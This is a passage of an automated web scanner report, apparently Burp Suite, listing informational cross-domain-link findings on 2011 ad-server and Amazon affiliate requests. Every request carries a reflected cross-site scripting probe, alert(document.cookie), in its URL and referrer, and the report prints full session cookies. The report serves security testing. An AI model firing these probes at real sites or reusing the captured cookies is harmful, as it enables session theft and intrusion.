Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:
  • http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
The response contains the following link to another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 03:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924994.772178.0XMC
Set-Cookie: C2=Y5jPNJpwIg02F4FCdbdBehgohXgXwOoAM/oRBK7YDwAoGj6r1VQcKasjGKGBI9YRIP53FkL3F+4gPbw6TV4ssu2B/0mBBea7IIaWG4F; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: F1=BglP+0kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHZpA!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzq1oH!; domain=advertising.com; expires=Thu, 24-Jan-2013 03:07:04 GMT; path=/
Set-Cookie: 49004778=_4d3e3e58,2634220834,772178^924994^87^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 25 Jan 2011 03:07:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3e3e58,2634220834,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=2634220834?">');document.write('<\/SCRIPT>
...[SNIP]...

20.519. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:
  • http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
The response contains the following link to another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 21:08:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:08:40 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 21:08:40 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: F1=Bkl690kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJl2JpJh5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzqEXE!; domain=advertising.com; expires=Wed, 23-Jan-2013 21:08:41 GMT; path=/
Set-Cookie: 49004778=_4d3dea59,5764026402,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3dea59,5764026402,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=5764026402?">');document.write('<\/SCRIPT>
...[SNIP]...

20.520. http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1

Issue detail

The page was loaded from a URL containing a query string:
  • http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
The response contains the following link to another domain:
  • http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?

Request

GET /site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA= HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; F1=BQiz50kAAAAAjM7CAEAAgEABAAAABAAAAEAAgEA; BASE=YnQIr9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvG!; ROLL=v5Q2V0M7N+zqILE!; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; C2=/nePNJpwIg02FAHCdbdBwhgohXAcwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; GUID=MTI5NTkwMzIzMTsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; A07L=CT-1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Comscore: CMXID=2115.924994.772178.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 24 Jan 2011 22:03:20 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 584
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 22:03:20 GMT
Connection: close
Set-Cookie: A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; expires=Mon, 21-Feb-2011 22:03:20 GMT; path=/; domain=r1-ads.ace.advertising.com
Set-Cookie: C2=ocfPNJpwIg02F1GCdbdRthgohXUbwOoAM/ohQK7YDwAoGg7r1VQcKagnGKGBI9YhXP53FkL3F75gPbw6TVswsu2B/0mRQea7IIaWG1G; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: F1=Bgy990kAAAAASh8CAEAAgEABAAAABAAAAEAAgEA; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: BASE=YnQIo9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WFp+ZY63fzJnhGhJ9szxwHZQnZLI364iQjUbvvTIm5HoBJ/dvGn4fkHCXD!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: ROLL=v5Q2V0M9itzquWE!; domain=advertising.com; expires=Wed, 23-Jan-2013 22:03:20 GMT; path=/
Set-Cookie: 49004778=_4d3df728,7545040742,772178^924994^87^0,0_; domain=advertising.com; path=/click
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4319.AOL/B2387887.363;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000772178/mnum=0000924994/cstr=49004778=_4d3df728,7545040742,772178^924994^87^0,1_/xsxdata=$xsxdata/bnum=49004778/optn=64?trg=;ord=7545040742?">');document.write('<\/SCRIPT>
...[SNIP]...

20.521. http://rcm.amazon.com/e/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:
  • http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1
The response contains the following link to another domain:
  • http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL80_.jpg

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:01 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4168
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://www.amazon.com/dp/B000EFAO1G?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379969&amp;linkCode=op1&amp;creativeASIN=B000EFAO1G&amp;adid=0GZGV3PX406SYA9DGF7Q&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/41sJRFASbxL._SL80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.522. http://rcm.amazon.com/e/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:
  • http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1
The response contains the following link to another domain:
  • http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL80_.jpg

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=8&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:07:06 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 4074
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
<a href="http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&amp;camp=211493&amp;creative=379969&amp;linkCode=op1&amp;creativeASIN=0313363153&amp;adid=0YRHE24D9W6NH92FF1EW&amp;" target="_blank"><img class="productImage" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL80_.jpg" alt="Amazon.com" /><span class="title">
...[SNIP]...

20.523. http://rcm.amazon.com/e/cm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rcm.amazon.com
Path:   /e/cm

Issue detail

The page was loaded from a URL containing a query string:
  • http://rcm.amazon.com/e/cm?t=parenthoodcom-20&o=1&p=12&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1
The response contains the following links to other domains:
  • http://ecx.images-amazon.com/images/I/41FKyRhFnxL._SX60_SY80_.jpg
  • http://ecx.images-amazon.com/images/I/512RttCMV1L._SX60_SY80_.jpg
  • http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SX60_SY80_.jpg
  • http://ecx.images-amazon.com/images/I/51K2a3Cte9L._SX60_SY80_.jpg

Request

GET /e/cm?t=parenthoodcom-20&o=1&p=12&l=op1&pvid=FAF57618C04BCD50&ref-url=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&ref-title=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&ref-ref=http%3A//burp/show/57&bgc=FFFFFF&bdc=D4CCB2&pcc=990000&tec=5D6E4F&tic=714653&ac=714653&pvc=6E6E6E&mp=1&hl=1&tg=_blank&dsc=1&f=ifr&e=iso-8859-1 HTTP/1.1
Host: rcm.amazon.com
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session-token=Z2JSK2RoUn+3UMHwG7/GMLAwP03jsMX2IupgD8XjIWL/cWEmFwNPxyjc+zvmeSxHFRri2WjEoaTthJUtEq8EAL61ozW8DRERMFViffbf4t9K0iQzlFKBaFiYf9vzLMP7fsKMskc0pEdBhkFJzjZjmTFuuFcjAIQqpefiCQpUp1OGTQNkcOqpUWmgyA0iAScPLbkwsq14aJ6RQliVt1HPt64kToJxXKmZWZXgpLdM8HZ79M0ij5nOCXDOxmXxRdkg; ubid-main=184-7948791-6690213; session-id-time=2082787201l; session-id=175-4977389-9084947; apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:12 GMT
Server: Server
Set-Cookie: apn-user-id=efdefc51-984d-4206-a2cf-3e1833f8e844; expires=Thu, 01-Jan-2037 08:00:01 GMT; path=/; domain=.amazon.com;
p3p: policyref="http://rcm.amazon.com/w3c/p3p-us.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Cache-control: no-store
Content-Length: 6062
nnCoection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-
...[SNIP]...
